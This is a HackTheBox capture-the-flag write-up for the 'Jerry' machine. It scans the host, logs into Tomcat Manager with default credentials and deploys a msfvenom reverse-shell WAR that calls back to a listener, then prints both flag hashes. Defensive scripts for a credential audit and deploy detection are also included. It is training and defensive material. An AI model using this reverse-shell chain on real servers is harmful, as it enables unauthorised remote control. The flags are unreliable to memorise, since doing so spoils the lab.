Jerry
About this machine: HTB
Operating system: Windows
Skills used:
java
LFI
war
First reconnaissance with nmap:
nmap -p- --open -sS -T4 -Pn -n 10.10.10.95 -oN First_Scann

PORT     STATE SERVICE
8080/tcp open  http-proxy
Only port 8080 is open; let's see what is running on it:
[screenshot]
We enumerate directories with gobuster:
gobuster dir -u "http://10.10.10.95:8080/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.10.95:8080/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
Starting gobuster in directory enumeration mode
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 0]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
When we open /manager it returns an error code, but the error page shows the default credentials, tomcat and s3cret; we try to log in with them and get access:
[screenshot]
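The foothold above comes from a Manager account that still carries the credentials printed on Tomcat's own 401 page. A quick defensive check is to audit tomcat-users.xml for exactly that condition. The script below is an added example, not part of this writeup: the XML is a constructed sample, the list of known default pairs is an assumption (it contains the tomcat/s3cret pair from the page plus the documentation examples), and the 12-character threshold is an arbitrary policy value.

```python
"""Audit a Tomcat tomcat-users.xml for default credentials and for weak
passwords on accounts that hold Manager/Host Manager roles.
Added example; the sample XML and the credential list are constructed."""
import xml.etree.ElementTree as ET

# Constructed list: the pair found in the writeup (tomcat/s3cret) plus the
# example pairs that appear in Tomcat's shipped configuration comments.
KNOWN_DEFAULT_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}
KNOWN_DEFAULT_PASSWORDS = {pwd for _, pwd in KNOWN_DEFAULT_CREDS}

# Roles that allow deploying or administering applications via the Manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
MIN_PASSWORD_LEN = 12  # assumed local policy, not a Tomcat default

# Constructed sample with one default account, one acceptable account and one
# account reusing a documented password under a different username.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Lr8!mQ2vT9zPw4Kx" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="manager-status"/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip the XML namespace from an element tag ('{ns}user' -> 'user')."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of findings, one dict per problematic <user> element."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        user = el.get("username", "")
        pwd = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)

        if (user, pwd) in KNOWN_DEFAULT_CREDS:
            rule = "default-credentials"
        elif pwd in KNOWN_DEFAULT_PASSWORDS:
            rule = "default-password"
        elif privileged and len(pwd) < MIN_PASSWORD_LEN:
            rule = "short-password-on-privileged-account"
        else:
            continue
        findings.append({"user": user, "rule": rule, "privileged_roles": privileged})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

Run it against a real file with `audit_tomcat_users(open("conf/tomcat-users.xml").read())`; any finding with a non-empty privileged_roles list is an account that can deploy code to the server, which is the condition the rest of this writeup exploits.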
We can now build a payload with msfvenom, upload it through the Manager as a WAR file, and aim for a reverse shell as the end result.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war -o revshell.war
Payload size: 1099 bytes
Final size of war file: 1099 bytes
Saved as: revshell.war

ls
First_Scann  revshell.war  SVC_Scann

nc -lvp 443
listening on [any] 443 ...
[screenshot]
nc -lvp 443
listening on [any] 443 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
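On the defender's side, the WAR upload and the first request to the freshly deployed context both land in Tomcat's access log. The script below is an added example, not part of this writeup: it parses constructed lines in Tomcat's default "common" access-log pattern, flags successful requests to the Manager deploy endpoints, and then flags any request from the same client, within an assumed ten-minute window, that hits a context outside a constructed baseline of stock contexts. The baseline set, the window and the sample lines are assumptions.

```python
"""Detect application deployments through the Tomcat Manager in an access
log and the follow-up access to the newly created context.
Added example; the log lines and the baseline of known contexts are constructed."""
import re
from datetime import datetime, timedelta

# Constructed sample: failed anonymous access, authenticated Manager access,
# a WAR upload, a hit on the new context, and unrelated benign traffic.
SAMPLE_ACCESS_LOG = """\
10.10.14.3 - - [19/Jun/2018:07:05:12 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [19/Jun/2018:07:05:20 +0000] "GET /manager/html HTTP/1.1" 200 19541
10.10.14.3 - tomcat [19/Jun/2018:07:06:03 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 302 -
10.10.14.3 - - [19/Jun/2018:07:06:10 +0000] "GET /revshell/ HTTP/1.1" 200 -
10.10.10.20 - tomcat [19/Jun/2018:07:30:00 +0000] "GET /manager/status HTTP/1.1" 200 8123
10.10.10.20 - - [19/Jun/2018:08:00:00 +0000] "GET /docs/ HTTP/1.1" 200 3012
"""

# Tomcat "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that create a new web application (HTML and text interfaces).
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy")
# Assumed baseline: contexts present on a stock install of this server.
BASELINE_CONTEXTS = {"/", "/docs", "/examples", "/manager", "/host-manager"}
WINDOW = timedelta(minutes=10)  # assumed correlation window


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    return rec


def context_of(path):
    """Top-level context a request path belongs to ('/a/b' -> '/a', '/' -> '/')."""
    parts = path.split("/")
    return "/" + parts[1] if len(parts) > 1 and parts[1] else "/"


def detect_manager_deploys(log_text):
    """Return alerts for deployments and for accesses to unknown contexts after them."""
    alerts = []
    last_deploy = {}  # client ip -> timestamp of its last successful deploy
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        is_deploy = (rec["method"] in ("POST", "PUT")
                     and rec["path"].startswith(DEPLOY_PREFIXES)
                     and rec["status"] < 400)
        if is_deploy:
            alerts.append({"rule": "manager-deploy", "ip": rec["ip"],
                           "user": rec["user"], "path": rec["path"]})
            last_deploy[rec["ip"]] = rec["ts"]
            continue
        ctx = context_of(rec["path"])
        seen = last_deploy.get(rec["ip"])
        if (seen is not None and rec["ts"] - seen <= WINDOW
                and ctx not in BASELINE_CONTEXTS and rec["status"] < 400):
            alerts.append({"rule": "new-context-after-deploy", "ip": rec["ip"],
                           "context": ctx})
    return alerts


if __name__ == "__main__":
    for alert in detect_manager_deploys(SAMPLE_ACCESS_LOG):
        print(alert)
```

The second rule is what separates a routine release from an attacker's drop: a legitimate deploy pipeline rarely requests its own new context seconds later from the same address, and a context name that is not in the deployment inventory is worth a look regardless.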
We are in; we look for the first flag:
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,412,097,536 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e